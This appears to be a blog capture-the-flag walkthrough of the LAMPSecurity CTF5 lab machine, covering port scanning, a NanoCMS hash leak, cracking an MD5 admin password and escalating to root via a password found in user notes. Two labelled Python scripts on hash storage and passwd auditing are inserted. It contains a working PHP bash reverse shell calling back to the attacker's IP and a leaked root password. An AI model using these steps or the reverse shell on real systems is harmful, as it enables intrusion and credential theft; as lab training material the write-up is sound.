Host discovery and information gathering
nmap -sn 192.168.25.0/24
nmap --min-rate 10000 -p- $ip
PORT      STATE SERVICE
22/tcp    open  ssh
25/tcp    open  smtp
80/tcp    open  http
110/tcp   open  pop3
111/tcp   open  rpcbind
139/tcp   open  netbios-ssn
143/tcp   open  imap
445/tcp   open  microsoft-ds
901/tcp   open  samba-swat
3306/tcp  open  mysql
37177/tcp open  unknown
MAC Address: 00:0C:29:F7:EA:95 (VMware)
nmap -sT -sV -O -p22,25,80,110,111,139,143,445,901,3306,37177 $ip
PORT      STATE SERVICE     VERSION
22/tcp    open  ssh         OpenSSH 4.7 (protocol 2.0)
25/tcp    open  smtp        Sendmail 8.14.1/8.14.1
80/tcp    open  http        Apache httpd 2.2.6 ((Fedora))
110/tcp   open  pop3        UW Imap pop3d 2006k.101
111/tcp   open  rpcbind     2-4 (RPC #100000)
139/tcp   open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: MYGROUP)
143/tcp   open  imap        UW imapd 2006k.396
445/tcp   open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: MYGROUP)
901/tcp   open  http        Samba SWAT administration server
3306/tcp  open  mysql       MySQL 5.0.45
37177/tcp open  status      1 (RPC #100024)
nmap --script=vuln -p22,25,80,110,111,139,143,445,901,3306,37177 $ip
PORT      STATE SERVICE
22/tcp    open  ssh
25/tcp    open  smtp
| smtp-vuln-cve2010-4344:
|_  The SMTP server is not Exim: NOT VULNERABLE
80/tcp    open  http
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
|_http-trace: TRACE is enabled
| http-sql-injection:
|   Possible sqli for queries:
|     http://192.168.25.140:80/?page=about%27%20OR%20sqlspider
|     http://192.168.25.140:80/?page=contact%27%20OR%20sqlspider
|     http://192.168.25.140:80/events/?q=event%2Fical%27%20OR%20sqlspider
|     http://192.168.25.140:80/?page=about%27%20OR%20sqlspider
|     http://192.168.25.140:80/?page=contact%27%20OR%20sqlspider
|     http://192.168.25.140:80/?page=about%27%20OR%20sqlspider
|     http://192.168.25.140:80/?page=contact%27%20OR%20sqlspider
|     http://192.168.25.140:80/?page=about%27%20OR%20sqlspider
|     http://192.168.25.140:80/?page=contact%27%20OR%20sqlspider
|     http://192.168.25.140:80/events/?q=event%2Fical%27%20OR%20sqlspider
|     http://192.168.25.140:80/events/?q=event%2Fical%27%20OR%20sqlspider
|     http://192.168.25.140:80/events/?q=event%2Fical%27%20OR%20sqlspider
|     http://192.168.25.140:80/events/?q=event%2Fical%27%20OR%20sqlspider
|     http://192.168.25.140:80/events/?q=event%2Ffeed%27%20OR%20sqlspider
|     http://192.168.25.140:80/events/?q=event%2Fical%27%20OR%20sqlspider
|     http://192.168.25.140:80/events/?q=event%2Fical%27%20OR%20sqlspider
|     http://192.168.25.140:80/events/?q=event%2Fical%27%20OR%20sqlspider
|_    http://192.168.25.140:80/events/?q=event%2Fical%27%20OR%20sqlspider
| http-slowloris-check:
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|
|     Disclosure date: 2009-09-17
|     References:
|       http://ha.ckers.org/slowloris/
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-fileupload-exploiter:
|
|_    Couldn't find a file-type field.
| http-enum:
|   /info.php: Possible information file
|   /phpmyadmin/: phpMyAdmin
|   /squirrelmail/src/login.php: squirrelmail version 1.4.11-1.fc8
|   /squirrelmail/images/sm_logo.png: SquirrelMail
|   /icons/: Potentially interesting folder w/ directory listing
|_  /inc/: Potentially interesting folder
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.25.140
|   Found the following possible CSRF vulnerabilities:
|
|     Path: http://192.168.25.140:80/events/
|     Form id: user-login-form
|     Form action: /events/?q=node&destination=node
|
|     Path: http://192.168.25.140:80/?page=contact
|     Form id:
|     Form action: ?page=contact
|
|     Path: http://192.168.25.140:80/events/?q=node/2
|     Form id: user-login-form
|     Form action: /events/?q=node/2&destination=node%2F2
|
|     Path: http://192.168.25.140:80/events/?q=node&destination=node
|     Form id: user-login-form
|     Form action: /events/?q=node&destination=node%3Famp%253Bdestination%3Dnode
|
|     Path: http://192.168.25.140:80/events/?q=tracker
|     Form id: user-login-form
|     Form action: /events/?q=tracker&destination=tracker
|
|     Path: http://192.168.25.140:80/events/?q=blog
|     Form id: user-login-form
|     Form action: /events/?q=blog&destination=blog
|
|     Path: http://192.168.25.140:80/events/?q=event
|     Form id: event-taxonomy-filter-form
|     Form action: /events/?q=event
|
|     Path: http://192.168.25.140:80/events/?q=event
|     Form id: event-type-filter-form
|     Form action: /events/?q=event
|
|     Path: http://192.168.25.140:80/events/?q=event
|     Form id: user-login-form
|     Form action: /events/?q=event&destination=event
|
|     Path: http://192.168.25.140:80/events/?q=node/1
|     Form id: user-login-form
|     Form action: /events/?q=node/1&destination=node%2F1
|
|     Path: http://192.168.25.140:80/events/?q=comment/reply/2
|     Form id: comment-form
|     Form action: /events/?q=comment/reply/2
|
|     Path: http://192.168.25.140:80/events/?q=comment/reply/2
|     Form id: user-login-form
|     Form action: /events/?q=comment/reply/2&destination=comment%2Freply%2F2
|
|     Path: http://192.168.25.140:80/events/?q=blog/1
|     Form id: user-login-form
|     Form action: /events/?q=blog/1&destination=blog%2F1
|
|     Path: http://192.168.25.140:80/events/?q=user/register
|     Form id: user-register
|_    Form action: /events/?q=user/register
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
110/tcp   open  pop3
111/tcp   open  rpcbind
139/tcp   open  netbios-ssn
143/tcp   open  imap
445/tcp   open  microsoft-ds
901/tcp   open  samba-swat
3306/tcp  open  mysql
|_mysql-vuln-cve2012-2122: ERROR: Script execution failed (use -d to debug)
37177/tcp open  unknown
MAC Address: 00:0C:29:F7:EA:95 (VMware)

Host script results:
|_smb-vuln-ms10-061: false
|_smb-vuln-ms10-054: false
|_smb-vuln-regsvc-dos: ERROR: Script execution failed (use -d to debug)
Port 80 web service penetration
Directory brute-forcing
gobuster dir -u http://192.168.25.140/ --wordlist=/usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
/events               (Status: 301) [Size: 316] [--> http://192.168.25.140/events/]
/mail                 (Status: 301) [Size: 314] [--> http://192.168.25.140/mail/]
/list                 (Status: 301) [Size: 314] [--> http://192.168.25.140/list/]
/inc                  (Status: 301) [Size: 313] [--> http://192.168.25.140/inc/]
/phpmyadmin           (Status: 301) [Size: 320] [--> http://192.168.25.140/phpmyadmin/]
/squirrelmail         (Status: 301) [Size: 322] [--> http://192.168.25.140/squirrelmail/]
Following the hint from the scan, there is a file inclusion vulnerability in the page parameter:
http://192.168.25.140/?page=about%27%20OR%20sqlspider

http://192.168.25.140/events/?q=event%2Fical%27%20OR%20sqlspider

The CMS framework is identified:
NanoCMS

Looking for an exploit
searchsploit NanoCMS
There is a remote command execution vulnerability, but it needs credentials we do not have yet, so we have to skip it for now.

Search in the browser to see whether anything else is known:

https://www.securityspace.com/smysecure/catid.html?id=1.3.6.1.4.1.25623.1.0.100141
Here we find an information disclosure vulnerability:
the file /data/pagesdata.txt inside the site directory is readable.
http://192.168.25.140/~andy/data/pagesdata.txt

;s:8:"username";s:5:"admin";s:8:"password";s:32:"9d2f75377ac0ab991d40c91fd27e52fd"
hash-identifier 9d2f75377ac0ab991d40c91fd27e52fd

The hash type is identified as MD5.
MD5 lookup sites:
pmd5.com
ttmd5.com
xmd5.com
https://hashes.com/zh/decrypt/hash (bookmark this one)
The password cracks to: shannon
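The root cause here is a world-readable data file holding an unsalted MD5 password hash. As an added example, not part of this walkthrough or of NanoCMS, the Python script below parses a constructed fragment in the same PHP serialize() shape as pagesdata.txt, classifies the hash by shape (the idea behind hash-identifier), shows why an unsalted MD5 falls to a single pass over a wordlist, and contrasts a salted, slow PBKDF2 store. The hash (MD5 of "password") and the wordlist are constructed, not the target's.

```python
import hashlib
import hmac
import os
import re

# Constructed sample in the shape of the pagesdata.txt leak: PHP serialize()
# output. The hash is a constructed value (MD5 of "password"), not the target's.
SAMPLE_FRAGMENT = (
    'a:2:{s:8:"username";s:5:"admin";'
    's:8:"password";s:32:"5f4dcc3b5aa765d61d8327deb882cf99";}'
)

# Constructed mini wordlist standing in for the online lookup tables.
WORDLIST = ["letmein", "shannon", "password", "admin"]


def parse_php_strings(fragment):
    """Return every s:<len>:"<value>"; string in a PHP serialize() fragment.

    The declared byte length is honoured, so a value containing quotes or
    semicolons does not derail the parse (a naive regex would)."""
    values = []
    i = 0
    while True:
        j = fragment.find("s:", i)
        if j < 0:
            return values
        k = fragment.index(":", j + 2)      # end of the length field
        length = int(fragment[j + 2:k])
        start = k + 2                        # skip the ':"'
        value = fragment[start:start + length]
        if fragment[start + length:start + length + 2] != '";':
            raise ValueError("malformed serialized string at offset %d" % j)
        values.append(value)
        i = start + length + 2


def extract_credentials(fragment):
    """Pair the strings up as key/value, as the a:{...} array above does."""
    values = parse_php_strings(fragment)
    return dict(zip(values[0::2], values[1::2]))


def classify_hash(h):
    """Coarse shape-based classification; 32 hex chars is MD5-shaped."""
    if h.startswith("$"):
        return "crypt-like"        # $1$/$5$/$6$ crypt formats carry a salt
    if re.fullmatch(r"[0-9a-f]{32}", h):
        return "md5-like"
    if re.fullmatch(r"[0-9a-f]{40}", h):
        return "sha1-like"
    return "unknown"


def dictionary_check(md5_hex, wordlist):
    """Why an unsalted MD5 leak is fatal: one cheap hash per candidate word."""
    for word in wordlist:
        if hashlib.md5(word.encode()).hexdigest() == md5_hex:
            return word
    return None


def hash_password(password, salt=None, iterations=200_000):
    """Hardened alternative: per-user random salt plus a slow KDF."""
    salt = os.urandom(16) if salt is None else salt
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return "pbkdf2_sha256$%d$%s$%s" % (iterations, salt.hex(), digest.hex())


def verify_password(password, stored):
    """Recompute with the stored salt and compare in constant time."""
    _algo, iters, salt_hex, digest_hex = stored.split("$")
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(),
                                 bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(digest.hex(), digest_hex)


if __name__ == "__main__":
    creds = extract_credentials(SAMPLE_FRAGMENT)
    print(creds, classify_hash(creds["password"]))
    print("dictionary hit:", dictionary_check(creds["password"], WORDLIST))
    stored = hash_password("shannon")
    print(stored, verify_password("shannon", stored))
```

With the salted store, two users with the same password get different records and each guess costs a full PBKDF2 run, so a leaked file no longer yields passwords from a lookup table.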

Admin backend login
http://192.168.25.140/~andy/data/nanoadmin.php

Logged in successfully.
Embed PHP reverse shell code in a site page:

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.25.132/4444 0>&1'");?>
After saving, start a listener in Kali:
nc -nvlp 4444
Then go back and click Contact.

Obtaining an initial foothold
The connection comes back.

Privilege escalation
whoami
id
ip addr
ls
uname -a
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
rpc:x:32:32:Rpcbind Daemon:/var/lib/rpcbind:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
tcpdump:x:72:72::/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
rpm:x:37:37:RPM user:/var/lib/rpm:/sbin/nologin
polkituser:x:87:87:PolicyKit:/:/sbin/nologin
avahi:x:499:499:avahi-daemon:/var/run/avahi-daemon:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
openvpn:x:498:497:OpenVPN:/etc/openvpn:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
torrent:x:497:496:BitTorrent Seed/Tracker:/var/spool/bittorrent:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
gdm:x:42:42::/var/gdm:/sbin/nologin
patrick:x:500:500:Patrick Fair:/home/patrick:/bin/bash
jennifer:x:501:501:Jennifer Sea:/home/jennifer:/bin/bash
andy:x:502:502:Andrew Carp:/home/andy:/bin/bash
loren:x:503:503:Loren Felt:/home/loren:/bin/bash
amy:x:504:504:Amy Pendelton:/home/amy:/bin/bash
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
cyrus:x:76:12:Cyrus IMAP Server:/var/lib/imap:/bin/bash
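What the /etc/passwd listing is used for above is picking out the accounts that can actually log in, and it also shows a hardening finding: service accounts such as mysql and cyrus carry /bin/bash instead of /sbin/nologin. As an added example, not part of this walkthrough, the Python script below parses a constructed passwd excerpt modelled on that listing and reports login-capable accounts, uid 0 accounts, and system accounts that still have a shell. The uid boundary of 500 for regular users is an assumption matching this Fedora-era box.

```python
# Constructed excerpt in /etc/passwd format, modelled on the listing above
# (a few representative lines, not the full file).
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
patrick:x:500:500:Patrick Fair:/home/patrick:/bin/bash
andy:x:502:502:Andrew Carp:/home/andy:/bin/bash
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
cyrus:x:76:12:Cyrus IMAP Server:/var/lib/imap:/bin/bash
"""

# Shells that deny interactive login.
NOLOGIN_SHELLS = {"/sbin/nologin", "/usr/sbin/nologin", "/bin/false", ""}
# First regular-user uid on this box (assumption; UID_MIN in login.defs).
UID_MIN = 500


def parse_passwd(text):
    """Parse passwd(5) lines into dicts; the gecos field may contain spaces."""
    entries = []
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            raise ValueError("malformed passwd line: %r" % line)
        name, _pw, uid, gid, gecos, home, shell = fields
        entries.append({"name": name, "uid": int(uid), "gid": int(gid),
                        "gecos": gecos, "home": home, "shell": shell})
    return entries


def interactive_accounts(entries):
    """Accounts whose shell permits interactive login."""
    return [e["name"] for e in entries if e["shell"] not in NOLOGIN_SHELLS]


def uid0_accounts(entries):
    """Every uid 0 account is root regardless of its name."""
    return [e["name"] for e in entries if e["uid"] == 0]


def service_accounts_with_shell(entries, uid_min=UID_MIN):
    """System accounts (below uid_min, excluding root) that still have a shell;
    these are the ones to move to /sbin/nologin."""
    return [e["name"] for e in entries
            if 0 < e["uid"] < uid_min and e["shell"] not in NOLOGIN_SHELLS]


if __name__ == "__main__":
    entries = parse_passwd(SAMPLE_PASSWD)
    print("interactive:", interactive_accounts(entries))
    print("uid 0:", uid0_accounts(entries))
    print("service accounts with a shell:", service_accounts_with_shell(entries))
```

Run against the real file with parse_passwd(open("/etc/passwd").read()); any name returned by service_accounts_with_shell is a candidate for usermod -s /sbin/nologin.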
Search for user traces, looking for leaked user credentials:
grep -R -i pass /home/* 2>/dev/null
/home/patrick/.tomboy/481bca0d-7206-45dd-a459-a72ea1131329.note:  <title>Root password</title>
/home/patrick/.tomboy/481bca0d-7206-45dd-a459-a72ea1131329.note:  <text xml:space="preserve"><note-content version="0.1">Root password
/home/patrick/.tomboy/481bca0d-7206-45dd-a459-a72ea1131329.note:Root password
/home/patrick/.tomboy.log:12/5/2012 7:24:46 AM [DEBUG]: Renaming note from New Note 3 to Root password
/home/patrick/.tomboy.log:12/5/2012 7:24:56 AM [DEBUG]: Saving 'Root password'...
/home/patrick/.tomboy.log:12/5/2012 7:25:03 AM [DEBUG]: Saving 'Root password'...

Root password: 50$cent
su prompts for an interactive TTY, so spawn one first:

python -c 'import pty; pty.spawn("/bin/bash")'
Run the command above, then switch to root:
su - switches to root; with no argument after -, the target user defaults to root.

When using sudo su, you enter the current user's own password,
because sudo's mechanism checks the current user's privileges to decide whether the following command (here su) may be run. If the current user is not authorized in the sudoers file to run su through sudo, sudo su fails even with the correct current-user password.
Unless otherwise stated, all articles on this blog are the author's original work.
If reposting, please cite the source: https://www.oneblanks.xyz/lampsecurityctf5%e9%9d%b6%e6%9c%ba%e7%bb%83%e4%b9%a0/